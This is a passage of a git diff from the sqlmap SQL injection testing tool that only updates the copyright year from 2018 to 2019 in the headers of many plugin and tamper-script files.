(http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/mysql/takeover.py b/plugins/dbms/mysql/takeover.py index 19207ba3e7c..a66d1231322 100644 --- a/plugins/dbms/mysql/takeover.py +++ b/plugins/dbms/mysql/takeover.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/oracle/__init__.py b/plugins/dbms/oracle/__init__.py index fa8b5368ecf..fd2c5f5afb8 100644 --- a/plugins/dbms/oracle/__init__.py +++ b/plugins/dbms/oracle/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/oracle/connector.py b/plugins/dbms/oracle/connector.py index 4f31e73089b..76d2087bf6a 100644 --- a/plugins/dbms/oracle/connector.py +++ b/plugins/dbms/oracle/connector.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/oracle/enumeration.py b/plugins/dbms/oracle/enumeration.py index 0ea903d6678..98154351619 100644 --- a/plugins/dbms/oracle/enumeration.py +++ b/plugins/dbms/oracle/enumeration.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/oracle/filesystem.py b/plugins/dbms/oracle/filesystem.py index aeb3a57f908..b4c8a176973 100644 --- a/plugins/dbms/oracle/filesystem.py +++ b/plugins/dbms/oracle/filesystem.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/oracle/fingerprint.py b/plugins/dbms/oracle/fingerprint.py index 692d26fb1d9..3cf07e69716 100644 --- a/plugins/dbms/oracle/fingerprint.py +++ b/plugins/dbms/oracle/fingerprint.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/oracle/syntax.py b/plugins/dbms/oracle/syntax.py index bb442759deb..df00405104d 100644 --- a/plugins/dbms/oracle/syntax.py +++ b/plugins/dbms/oracle/syntax.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/oracle/takeover.py b/plugins/dbms/oracle/takeover.py index b5b381c6227..c716307cd90 100644 --- a/plugins/dbms/oracle/takeover.py +++ b/plugins/dbms/oracle/takeover.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/postgresql/__init__.py b/plugins/dbms/postgresql/__init__.py index 41683881fda..a2153057482 100644 --- a/plugins/dbms/postgresql/__init__.py +++ b/plugins/dbms/postgresql/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/postgresql/connector.py b/plugins/dbms/postgresql/connector.py index e480d17dc5f..ac35c24b5f8 100644 --- a/plugins/dbms/postgresql/connector.py +++ b/plugins/dbms/postgresql/connector.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/postgresql/enumeration.py b/plugins/dbms/postgresql/enumeration.py index a5754895d42..c089fcba0f0 100644 --- a/plugins/dbms/postgresql/enumeration.py +++ b/plugins/dbms/postgresql/enumeration.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/postgresql/filesystem.py b/plugins/dbms/postgresql/filesystem.py index 46c3611be4d..d97b68db081 100644 --- a/plugins/dbms/postgresql/filesystem.py +++ b/plugins/dbms/postgresql/filesystem.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/postgresql/fingerprint.py b/plugins/dbms/postgresql/fingerprint.py index a4060687242..13867fd9da0 100644 --- a/plugins/dbms/postgresql/fingerprint.py +++ b/plugins/dbms/postgresql/fingerprint.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/postgresql/syntax.py b/plugins/dbms/postgresql/syntax.py index 3ba144511f5..c83d3b4fc43 100644 --- a/plugins/dbms/postgresql/syntax.py +++ b/plugins/dbms/postgresql/syntax.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/postgresql/takeover.py b/plugins/dbms/postgresql/takeover.py index 10b52a56c12..13edbbce162 100644 --- a/plugins/dbms/postgresql/takeover.py +++ b/plugins/dbms/postgresql/takeover.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/sqlite/__init__.py b/plugins/dbms/sqlite/__init__.py index 5f7e7922a8f..adb10a1b908 100644 --- a/plugins/dbms/sqlite/__init__.py +++ b/plugins/dbms/sqlite/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/sqlite/connector.py b/plugins/dbms/sqlite/connector.py index f214b39a32a..c406d2e07b2 100644 --- a/plugins/dbms/sqlite/connector.py +++ b/plugins/dbms/sqlite/connector.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/sqlite/enumeration.py b/plugins/dbms/sqlite/enumeration.py index f77f6feee5c..1af810a884d 100644 --- a/plugins/dbms/sqlite/enumeration.py +++ b/plugins/dbms/sqlite/enumeration.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/sqlite/filesystem.py b/plugins/dbms/sqlite/filesystem.py index 68937c506fd..190a7be8d9d 100644 --- a/plugins/dbms/sqlite/filesystem.py +++ b/plugins/dbms/sqlite/filesystem.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/sqlite/fingerprint.py b/plugins/dbms/sqlite/fingerprint.py index abaeeb2cb64..9fc3dcc3ec3 100644 --- a/plugins/dbms/sqlite/fingerprint.py +++ b/plugins/dbms/sqlite/fingerprint.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/sqlite/syntax.py b/plugins/dbms/sqlite/syntax.py index 611d9b6607b..ec6470aadf3 100644 --- a/plugins/dbms/sqlite/syntax.py +++ b/plugins/dbms/sqlite/syntax.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/sqlite/takeover.py b/plugins/dbms/sqlite/takeover.py index a4c89146e4f..8ec1c8466ea 100644 --- a/plugins/dbms/sqlite/takeover.py +++ b/plugins/dbms/sqlite/takeover.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/sybase/__init__.py b/plugins/dbms/sybase/__init__.py index 43ee7b166aa..20d74b76516 100644 --- a/plugins/dbms/sybase/__init__.py +++ b/plugins/dbms/sybase/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/sybase/connector.py b/plugins/dbms/sybase/connector.py index 36f69ef3227..3c7e37e78e0 100644 --- a/plugins/dbms/sybase/connector.py +++ b/plugins/dbms/sybase/connector.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/sybase/enumeration.py b/plugins/dbms/sybase/enumeration.py index 97263bc7194..872fc37db56 100644 --- a/plugins/dbms/sybase/enumeration.py +++ b/plugins/dbms/sybase/enumeration.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/sybase/filesystem.py b/plugins/dbms/sybase/filesystem.py index 59629a3ca52..51fc0884257 100644 --- a/plugins/dbms/sybase/filesystem.py +++ b/plugins/dbms/sybase/filesystem.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/sybase/fingerprint.py b/plugins/dbms/sybase/fingerprint.py index 5fda220b8ba..c88b22d045d 100644 --- a/plugins/dbms/sybase/fingerprint.py +++ b/plugins/dbms/sybase/fingerprint.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/sybase/syntax.py b/plugins/dbms/sybase/syntax.py index e83c65ed2ea..9b8f1e7fdd4 100644 --- a/plugins/dbms/sybase/syntax.py +++ b/plugins/dbms/sybase/syntax.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/dbms/sybase/takeover.py b/plugins/dbms/sybase/takeover.py index 73a17bd9f48..ab518e6c947 100644 --- a/plugins/dbms/sybase/takeover.py +++ b/plugins/dbms/sybase/takeover.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/generic/__init__.py b/plugins/generic/__init__.py index 7181b22a163..c654cbef7f4 100644 --- a/plugins/generic/__init__.py +++ b/plugins/generic/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/generic/connector.py b/plugins/generic/connector.py index c23593f7b66..ff04024307f 100644 --- a/plugins/generic/connector.py +++ b/plugins/generic/connector.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/generic/custom.py b/plugins/generic/custom.py index 599b2ccf448..fa390b361e3 100644 --- a/plugins/generic/custom.py +++ b/plugins/generic/custom.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/generic/databases.py b/plugins/generic/databases.py index 12a0b7ccad2..e126e65fc3c 100644 --- a/plugins/generic/databases.py +++ b/plugins/generic/databases.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/generic/entries.py b/plugins/generic/entries.py index 595e8f9a56f..87a4e9444e8 100644 --- a/plugins/generic/entries.py +++ b/plugins/generic/entries.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/generic/enumeration.py b/plugins/generic/enumeration.py index 0b6190ae473..c8b40728e41 100644 --- a/plugins/generic/enumeration.py +++ b/plugins/generic/enumeration.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/generic/filesystem.py b/plugins/generic/filesystem.py index 8ae9ecfca78..257b2deec43 100644 --- a/plugins/generic/filesystem.py +++ b/plugins/generic/filesystem.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/generic/fingerprint.py b/plugins/generic/fingerprint.py index 0eae42a9bbd..b593e629c1c 100644 --- a/plugins/generic/fingerprint.py +++ b/plugins/generic/fingerprint.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/generic/misc.py b/plugins/generic/misc.py index e61d5486c91..51c0fff0e86 100644 --- a/plugins/generic/misc.py +++ b/plugins/generic/misc.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/generic/search.py b/plugins/generic/search.py index e316c1ebc62..b9a5aaddcae 100644 --- a/plugins/generic/search.py +++ b/plugins/generic/search.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/generic/syntax.py b/plugins/generic/syntax.py index 0d20b3461d2..9ef65a54b17 100644 --- a/plugins/generic/syntax.py +++ b/plugins/generic/syntax.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/generic/takeover.py b/plugins/generic/takeover.py index cf721cdae29..a6d298e372e 100644 --- a/plugins/generic/takeover.py +++ b/plugins/generic/takeover.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/plugins/generic/users.py b/plugins/generic/users.py index cbb2fa7917d..538b2b10a95 100644 --- a/plugins/generic/users.py +++ b/plugins/generic/users.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/sqlmap.py b/sqlmap.py index 9d9272eabd7..b13d8c12e22 100755 --- a/sqlmap.py +++ b/sqlmap.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/sqlmapapi.py b/sqlmapapi.py index 14132bbdf6c..6804f7cf652 100755 --- a/sqlmapapi.py +++ b/sqlmapapi.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/tamper/0x2char.py b/tamper/0x2char.py index 50bbe8f51b3..26bb4fda017 100644 --- a/tamper/0x2char.py +++ b/tamper/0x2char.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/tamper/__init__.py b/tamper/__init__.py index 7181b22a163..c654cbef7f4 100644 --- a/tamper/__init__.py +++ b/tamper/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/tamper/apostrophemask.py b/tamper/apostrophemask.py index 231617ad64b..d5ed52de31f 100644 --- a/tamper/apostrophemask.py +++ b/tamper/apostrophemask.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/tamper/apostrophenullencode.py b/tamper/apostrophenullencode.py index 54fe9c80207..751c0096bcc 100644 --- a/tamper/apostrophenullencode.py +++ b/tamper/apostrophenullencode.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/tamper/appendnullbyte.py b/tamper/appendnullbyte.py index 1eaca164f1c..5d23e4d5789 100644 --- a/tamper/appendnullbyte.py +++ b/tamper/appendnullbyte.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/tamper/base64encode.py b/tamper/base64encode.py index 21ae80233fb..86eaa1c7bd5 100644 --- a/tamper/base64encode.py +++ b/tamper/base64encode.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/tamper/between.py b/tamper/between.py index 827e30ee1b8..7ee05fb41db 100644 --- a/tamper/between.py +++ b/tamper/between.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/tamper/bluecoat.py b/tamper/bluecoat.py index 5b17c0db66f..4b88a3985c5 100644 --- a/tamper/bluecoat.py +++ b/tamper/bluecoat.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/tamper/chardoubleencode.py b/tamper/chardoubleencode.py index b1d0f8fe2b4..512c2b3b4c6 100644 --- a/tamper/chardoubleencode.py +++ b/tamper/chardoubleencode.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/tamper/charencode.py b/tamper/charencode.py index 324c4a90d8a..bf2283b1f70 100644 --- a/tamper/charencode.py +++ b/tamper/charencode.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/tamper/charunicodeencode.py b/tamper/charunicodeencode.py index dc1a5dca3b1..8bd456fabc4 100644 --- a/tamper/charunicodeencode.py +++ b/tamper/charunicodeencode.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/tamper/charunicodeescape.py b/tamper/charunicodeescape.py index 28984164db6..790d8d6c49a 100644 --- a/tamper/charunicodeescape.py +++ b/tamper/charunicodeescape.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/tamper/commalesslimit.py b/tamper/commalesslimit.py index bf5d1325eed..7ebecbcecb4 100644 --- a/tamper/commalesslimit.py +++ b/tamper/commalesslimit.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/tamper/commalessmid.py b/tamper/commalessmid.py index 42b004b889d..3795868297a 100644 --- a/tamper/commalessmid.py +++ b/tamper/commalessmid.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/tamper/commentbeforeparentheses.py b/tamper/commentbeforeparentheses.py index 2d998b81991..23933c279ea 100644 --- a/tamper/commentbeforeparentheses.py +++ b/tamper/commentbeforeparentheses.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/tamper/concat2concatws.py b/tamper/concat2concatws.py index 4285eaab0ec..d2663bb2f79 100644 --- a/tamper/concat2concatws.py +++ b/tamper/concat2concatws.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/tamper/equaltolike.py b/tamper/equaltolike.py index b0a7c8977e0..bc65eff13db 100644 --- a/tamper/equaltolike.py +++ b/tamper/equaltolike.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/tamper/escapequotes.py b/tamper/escapequotes.py index 3ebcd466a58..db7c4c38876 100644 --- a/tamper/escapequotes.py +++ b/tamper/escapequotes.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/tamper/greatest.py b/tamper/greatest.py index 33e447132e6..989280cc89d 100644 --- a/tamper/greatest.py +++ b/tamper/greatest.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/tamper/halfversionedmorekeywords.py b/tamper/halfversionedmorekeywords.py index 6c3f0bfc10e..7a40f9f4c61 100644 --- a/tamper/halfversionedmorekeywords.py +++ b/tamper/halfversionedmorekeywords.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/tamper/htmlencode.py b/tamper/htmlencode.py index eadf3225d16..8eed7b406b6 100644 --- a/tamper/htmlencode.py +++ b/tamper/htmlencode.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/tamper/ifnull2casewhenisnull.py b/tamper/ifnull2casewhenisnull.py index c9a8c0ee2fa..0a23ce71ac7 100644 --- a/tamper/ifnull2casewhenisnull.py +++ b/tamper/ifnull2casewhenisnull.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/tamper/ifnull2ifisnull.py b/tamper/ifnull2ifisnull.py index 9e2531941fd..060b88a03f2 100644 --- a/tamper/ifnull2ifisnull.py +++ b/tamper/ifnull2ifisnull.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/tamper/informationschemacomment.py b/tamper/informationschemacomment.py index 24fcc7b9b9e..7076fecaa70 100644 --- a/tamper/informationschemacomment.py +++ b/tamper/informationschemacomment.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/tamper/least.py b/tamper/least.py index 6dc9630584a..53a8a6aadef 100644 --- a/tamper/least.py +++ b/tamper/least.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/tamper/lowercase.py b/tamper/lowercase.py index 51a86e33563..101e4436a70 100644 --- a/tamper/lowercase.py +++ b/tamper/lowercase.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/tamper/luanginx.py b/tamper/luanginx.py index bca93e16e79..edd22583670 100644 --- a/tamper/luanginx.py +++ b/tamper/luanginx.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) See the file 'LICENSE' for copying permission """ diff --git a/tamper/modsecurityversioned.py b/tamper/modsecurityversioned.py index 